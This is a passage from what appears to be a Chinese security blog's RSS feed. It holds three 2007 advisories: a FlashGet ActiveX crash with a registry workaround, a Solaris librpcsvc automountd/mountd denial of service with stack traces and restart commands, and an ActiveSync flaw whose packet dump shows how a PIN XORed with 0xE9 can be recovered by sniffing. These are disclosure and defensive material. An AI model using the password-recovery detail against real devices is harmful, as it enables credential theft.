		<description><![CDATA[一、事件分析： 今日，超级巡警团队监测到多个FlashGet拒绝服务漏洞被曝光，该漏洞发生在FlashGet的一个activex控件上，当安装了FlashGet的用户在浏览黑客精心构造的包含恶意代码的网页后，会导致用户浏览器崩溃。利用此漏洞的代码已在互联网上现身。 影响版本：FlashGet 1.9.6.1073 构造的漏洞利用网页截图： 触发此漏洞后的截图 二、解决方案 1、在网际快车官方发布补丁之前请暂时卸载网际快车，或者使用临时解决方案，将下面内容保存为.reg文件，双击导入注册表： －－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}] &#8220;Compatibility Flags&#8221;=dword:00000400 －－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－ 2、推荐安装超级巡警监测查杀木马。 3、请广大用户及时使用超级巡警的补丁检查功能，检查并安装系统补丁，预防更多的漏洞攻击。 注：此漏洞已通知网际快车官方，请关注官方升级解决方案。 关于网际快车（引自官方）：全球最多人使用的下载工具。 Related posts:WordPress < 2.8.1 Security Bypass 0day允许浏览目录(目录列表)访问，让爬虫更轻松的索引网站文件Discuz 6.0.0 0Day漏洞一些专业网址Rootkit相关链接Copyright &#169; 2007-2010 This feed is building by Lin's &#8230; <a href="http://clin003.com/exploits/flashget-0day-50/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>一、事件分析：</p>
<p>今日，超级巡警团队监测到多个FlashGet拒绝服务漏洞被曝光，该漏洞发生在FlashGet的一个activex控件上，当安装了FlashGet的用户在浏览黑客精心构造的包含恶意代码的网页后，会导致用户浏览器崩溃。利用此漏洞的代码已在互联网上现身。</p>
<p>影响版本：FlashGet 1.9.6.1073</p>
<p>构造的漏洞利用网页截图：<br />
<a href="http://wiki.mygogou.com/uploads/10/1193028489U36NfdNM.jpg" target="_blank"><img src="http://wiki.mygogou.com/uploads/10/s_1193028489U36NfdNM.jpg" alt="网际快车（FlashGet）0day漏洞" align="bottom" border="0" hspace="0" vspace="0" /></a><br />
触发此漏洞后的截图</p>
<p><a href="http://wiki.mygogou.com/uploads/10/1193028502FekPj0is.jpg" target="_blank"><img src="http://wiki.mygogou.com/uploads/10/s_1193028502FekPj0is.jpg" alt="网际快车（FlashGet）0day漏洞" align="bottom" border="0" hspace="0" vspace="0" /></a></p>
<p>二、解决方案<br />
1、在网际快车官方发布补丁之前请暂时卸载网际快车，或者使用临时解决方案，将下面内容保存为.reg文件，双击导入注册表：<br />
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－Windows Registry Editor Version 5.00</p>
<p>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}]<br />
&#8220;Compatibility Flags&#8221;=dword:00000400<br />
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－<br />
2、推荐安装超级巡警监测查杀木马。<br />
3、请广大用户及时使用超级巡警的补丁检查功能，检查并安装系统补丁，预防更多的漏洞攻击。</p>
<p>注：此漏洞已通知网际快车官方，请关注官方升级解决方案。</p>
<p>关于网际快车（引自官方）：全球最多人使用的下载工具。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/" rel="bookmark" title="Permanent Link: WordPress < 2.8.1 Security Bypass 0day">WordPress < 2.8.1 Security Bypass 0day</a></li><li><a href="http://clin003.com/servers/htaccess-options-indexes-2002/" rel="bookmark" title="Permanent Link: 允许浏览目录(目录列表)访问，让爬虫更轻松的索引网站文件">允许浏览目录(目录列表)访问，让爬虫更轻松的索引网站文件</a></li><li><a href="http://clin003.com/exploits/discuz-600-0day-2-198/" rel="bookmark" title="Permanent Link: Discuz 6.0.0 0Day漏洞">Discuz 6.0.0 0Day漏洞</a></li><li><a href="http://clin003.com/suggested-contents/some-professional-websites-143/" rel="bookmark" title="Permanent Link: 一些专业网址">一些专业网址</a></li><li><a href="http://clin003.com/rootkit/rootkit-related-links-36/" rel="bookmark" title="Permanent Link: Rootkit相关链接">Rootkit相关链接</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/flashget-0day-50/" >http://clin003.com/exploits/flashget-0day-50/</a> <br /> <a href="http://clin003.com/exploits/flashget-0day-50/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/flashget-0day-50/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sun Solaris RPC 服务库 librpcsvc 拒绝服务漏洞</title>
		<link>http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/</link>
		<comments>http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/#comments</comments>
		<pubDate>Mon, 22 Oct 2007 04:24:44 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[服务器]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library/</guid>
		<description><![CDATA[Sun Solaris RPC 服务库 librpcsvc 拒绝服务漏洞 受影响系统： Sun Solaris 9.0_x86 Sun Solaris 9.0 Sun Solaris 8.0_x86 Sun Solaris 8.0 Sun Solaris 10_x86 Sun Solaris 10.0 描述： BUGTRAQ  ID: 26071 Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。 如果用户调用了automountd(1M)服务去访问导出了大量文件系统的远程NFS服务器的话，Solaris RPC服务库（librpcsvc(3LIB)）中的安全漏洞可能允许本地非特权用户在系统上导致automountd(1M)守护程序崩溃。如果这个漏洞被利用，则用户可能看到访问autofs(4)加载点的进程变得没有响应并挂起。在Solaris 8、Solaris 9和Solaris 10系统上，控制台会打印且syslogd(1M)守护程序会记录类似于以下的消息： Sep  7 08:50:20 client1 autofs: &#8230; <a href="http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Sun Solaris RPC 服务库 librpcsvc 拒绝服务漏洞</p>
<p>受影响系统：<br />
Sun Solaris 9.0_x86<br />
Sun Solaris 9.0<br />
Sun Solaris 8.0_x86<br />
Sun Solaris 8.0<br />
Sun Solaris 10_x86<br />
Sun Solaris 10.0</p>
<p>描述：</p>
<p>BUGTRAQ  ID: 26071</p>
<p>Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。</p>
<p>如果用户调用了automountd(1M)服务去访问导出了大量文件系统的远程NFS服务器的话，Solaris RPC服务库（librpcsvc(3LIB)）中的安全漏洞可能允许本地非特权用户在系统上导致automountd(1M)守护程序崩溃。如果这个漏洞被利用，则用户可能看到访问autofs(4)加载点的进程变得没有响应并挂起。在Solaris 8、Solaris 9和Solaris 10系统上，控制台会打印且syslogd(1M)守护程序会记录类似于以下的消息：</p>
<p>Sep  7 08:50:20 client1 autofs: automountd not running, retrying</p>
<p>在Solaris 10系统上，控制台还会打印且syslogd(1M)守护程序也会记录类似于以下的消息：</p>
<p>Sep 12 02:04:12 client1 svc.startd[7]: system/filesystem/autofs:default<br />
failed repeatedly: transitioned to maintenance (see &#8216;svcs -xv&#8217; for details)</p>
<p>automountd(1M)服务会崩溃，栈追踪类似于以下：</p>
<p>ff2a31ac xdr_reference (b1bd4, 144ea8, c, ff384898, 81010100, ff00) + 84<br />
ff299418 xdr_pointer (b1bd4, 144ea8, c, ff384898, 0, 0) + 5c<br />
ff384880 xdr_exports (b1bd4, 144ea8, 0, 0, 0, 1235b7) + 20<br />
ff3848e0 xdr_exportnode (b1bd4, 144ea0, ffffffff, 0, 0, 0) + 48</p>
<p>这个漏洞还允许远程非特权用户在导出大量文件系统的NFS服务器上导致mountd(1M)服务崩溃，导致无法访问NFS客户端上的NFS共享。如果第二个漏洞被利用导致mountd(1M)拒绝服务的话，会观察到mountd(1M)服务可能会崩溃，栈追踪如下：</p>
<p>ff2a31ac xdr_reference (b1bd4, 144ea8, c, ff384898, 81010100, ff00) + 84<br />
ff299418 xdr_pointer (b1bd4, 144ea8, c, ff384898, 0, 0) + 5c<br />
ff384880 xdr_exports (b1bd4, 144ea8, 0, 0, 0, 1235b7) + 20<br />
ff3848e0 xdr_exportnode (b1bd4, 144ea0, ffffffff, 0, 0, 0) + 48</p>
<p>或者：</p>
<p>ff2a2b34 xdr_reference (ac92c, 13126c, 8, ff38481c, 81010100, ff00) + 84<br />
ff298dcc xdr_pointer (ac92c, 13126c, 8, ff38481c, 0, 0) + 5c<br />
ff384804 xdr_groups (ac92c, 13126c, 0, 0, 6d, 9632c) + 20<br />
ff384848 xdr_groupnode (ac92c, 131268, ffffffff, 0, 0, 0) + 2c</p>
<p>建议：</p>
<p>临时解决方法：</p>
<p>automountd(1M)漏洞：</p>
<p>在可以应用补丁之前，可通过删除或标注出/etc/auto_master文件中的-hosts项并重启automountd(1M)服务来临时解决automountd(1M)崩溃漏洞。</p>
<p>在Solaris 8和Solaris 9系统上以root用户运行以下命令重启automountd(1M)服务：</p>
<p># /etc/init.d/autofs start</p>
<p>在Solaris 10系统上以root用户运行以下命令重启automountd(1M)服务：</p>
<p># svcadm restart svc:/system/filesystem/autofs</p>
<p>如果svc:/system/filesystem/autofs处在维护状态的话，使用以下命令：</p>
<p># svcadm clear svc:/system/filesystem/autofs<br />
# svcadm enable svc:/system/filesystem/autofs</p>
<p>更改之后，必须使用automount(1M)工具卸载/net目录中的所有加载点。如果automount(1M)工具无法卸载/net目录中的任意加载点的话，则修改/etc/auto_master文件后必须重启系统。</p>
<p>mountd(1M)漏洞：</p>
<p>如果要临时解决非特权用户在远程NFS服务器上导致mountd(1M)服务崩溃的漏洞，可减少远程NFS服务器上共享文件系统的数目并重启该NFS服务器上的NFS服务。</p>
<p>如果要减少共享文件系统的数目，查看/etc/dfs/sharetab检查导出的文件系统并删除或标注/etc/dfs/dfstab中的项。</p>
<p>在Solaris 8和Solaris 9系统上以root用户运行以下命令重启NFS服务：</p>
<p># /etc/init.d/nfs.server stop<br />
# /etc/init.d/nfs.server start</p>
<p>在Solaris 10系统上以root用户运行以下命令重启NFS服务：</p>
<p># svcadm restart svc:/network/nfs/server:default</p>
<p>厂商补丁：</p>
<p>Sun已经为此发布了一个安全公告（Sun-Alert-103082）以及相应补丁:<br />
Sun-Alert-103082： Security Vulnerability in the Solaris RPC Services Library (librpcsvc(3LIB)) may Lead to a Denial of Service (DoS) Against Networked File Systems<br />
链接：http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-103082-1</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/wp-use/upgrading-wordpress-263-1550/" rel="bookmark" title="Permanent Link: 紧急更新至WordPress 2.6.3">紧急更新至WordPress 2.6.3</a></li><li><a href="http://clin003.com/ideas/discuz-plugin-exploits-1800/" rel="bookmark" title="Permanent Link: 使用Discuz插件的同学需要注意了">使用Discuz插件的同学需要注意了</a></li><li><a href="http://clin003.com/technical-analysis/microsofts-security-services-provide-expert-xing-fang-web2o-security-research-547/" rel="bookmark" title="Permanent Link: 看到技术文章很稀奇——微软安全服务提供专家方兴：Web2.O安全研究">看到技术文章很稀奇——微软安全服务提供专家方兴：Web2.O安全研究</a></li><li><a href="http://clin003.com/wp-use/wordpress-2-8-6-security-release-1838/" rel="bookmark" title="Permanent Link: 升级到 WordPress 2.8.6">升级到 WordPress 2.8.6</a></li><li><a href="http://clin003.com/exploits/what-is-a-random-number-vulnerability-203/" rel="bookmark" title="Permanent Link: 什么是随机数漏洞,什么是脆弱的随机数">什么是随机数漏洞,什么是脆弱的随机数</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/" >http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/</a> <br /> <a href="http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微软 ActiveSync程序存在弱口令混淆信息泄露漏洞</title>
		<link>http://clin003.com/exploits/activesync-loophole-24/</link>
		<comments>http://clin003.com/exploits/activesync-loophole-24/#comments</comments>
		<pubDate>Sun, 21 Oct 2007 05:16:51 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[ActiveSync]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/%e5%be%ae%e8%bd%af-activesync%e7%a8%8b%e5%ba%8f%e5%ad%98%e5%9c%a8%e5%bc%b1%e5%8f%a3%e4%bb%a4%e6%b7%b7%e6%b7%86%e4%bf%a1%e6%81%af%e6%b3%84%e9%9c%b2%e6%bc%8f%e6%b4%9e/</guid>
		<description><![CDATA[受影响系统： Microsoft ActiveSync 4.1 Microsoft Windows Mobile 5.0 不受影响系统： Microsoft Windows Mobile 6.0 描述： BUGTRAQ ID: 25976 CVE(CAN) ID: CVE-2007-5460 Microsoft ActiveSync是用于同步计算机与PDA的应用程序。 ActiveSync设备建立连接口令交换的过程实现上存在漏洞，攻击者可能利用此漏洞获取口令信息。 插 入到USB口时设备会使用类似于标准网络接口的连接，获得IP地址后设备会通过RAPI在990/TCP端口初始化与主机的通讯，这个过程也会经历一个小 型的握手例程，如果合适的话，会对主机挑战设备PIN或口令。用户提供了主机的PIN/口令后，会通过XOR与E9固定密钥进行混淆，然后通过USB网络 连接发送给设备进行验证。 这个过程会产生两个漏洞。首先，如果攻击者能够嗅探主机的网络连接的话，就可以恢复PIN/口令；其次，攻击者可以欺骗USB设备的插入过程诱骗用户提供PIN/口令。 以下面的报文为例： 0000 82 00 60 0f e8 00 80 00 60 0f &#8230; <a href="http://clin003.com/exploits/activesync-loophole-24/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>受影响系统：<br />
Microsoft ActiveSync 4.1<br />
Microsoft Windows Mobile 5.0<br />
不受影响系统：<br />
Microsoft Windows Mobile 6.0</p>
<p>描述：</p>
<p>BUGTRAQ  ID: 25976<br />
CVE(CAN) ID: CVE-2007-5460</p>
<p>Microsoft ActiveSync是用于同步计算机与PDA的应用程序。</p>
<p>ActiveSync设备建立连接口令交换的过程实现上存在漏洞，攻击者可能利用此漏洞获取口令信息。</p>
<p>插 入到USB口时设备会使用类似于标准网络接口的连接，获得IP地址后设备会通过RAPI在990/TCP端口初始化与主机的通讯，这个过程也会经历一个小 型的握手例程，如果合适的话，会对主机挑战设备PIN或口令。用户提供了主机的PIN/口令后，会通过XOR与E9固定密钥进行混淆，然后通过USB网络 连接发送给设备进行验证。</p>
<p>这个过程会产生两个漏洞。首先，如果攻击者能够嗅探主机的网络连接的话，就可以恢复PIN/口令；其次，攻击者可以欺骗USB设备的插入过程诱骗用户提供PIN/口令。</p>
<p>以下面的报文为例：</p>
<p>0000  82 00 60 0f e8 00 80 00  60 0f e8 00 08 00 45 00   ..`&#8230;.. `&#8230;..E.<br />
0010  00 32 59 95 40 00 80 06  49 31 a9 fe 02 02 a9 fe   .2Y.@&#8230; I1&#8230;&#8230;<br />
0020  02 01 03 de 05 d0 e8 c0  cb c0 56 2e 41 75 50 18   &#8230;&#8230;.. ..V.AuP.<br />
0030  fa 6a 91 dd 00 00 08 00  d8 e9 db e9 da e9 dd e9   .j&#8230;&#8230; &#8230;&#8230;..</p>
<p>36字节处为口令长度（8个字节），之后为空，然后为与E9混淆的口令。由于对口令使用了UNICODE字符串，因此每第二个字节都为0&#215;00 XOR 0xE9等于0xE9。</p>
<p>厂商补丁：</p>
<p>Microsoft</p>
<p>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：</p>
<p>http://www.microsoft.com/technet/security/</p>
<hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/activesync-loophole-24/" >http://clin003.com/exploits/activesync-loophole-24/</a> <br /> <a href="http://clin003.com/exploits/activesync-loophole-24/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/activesync-loophole-24/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
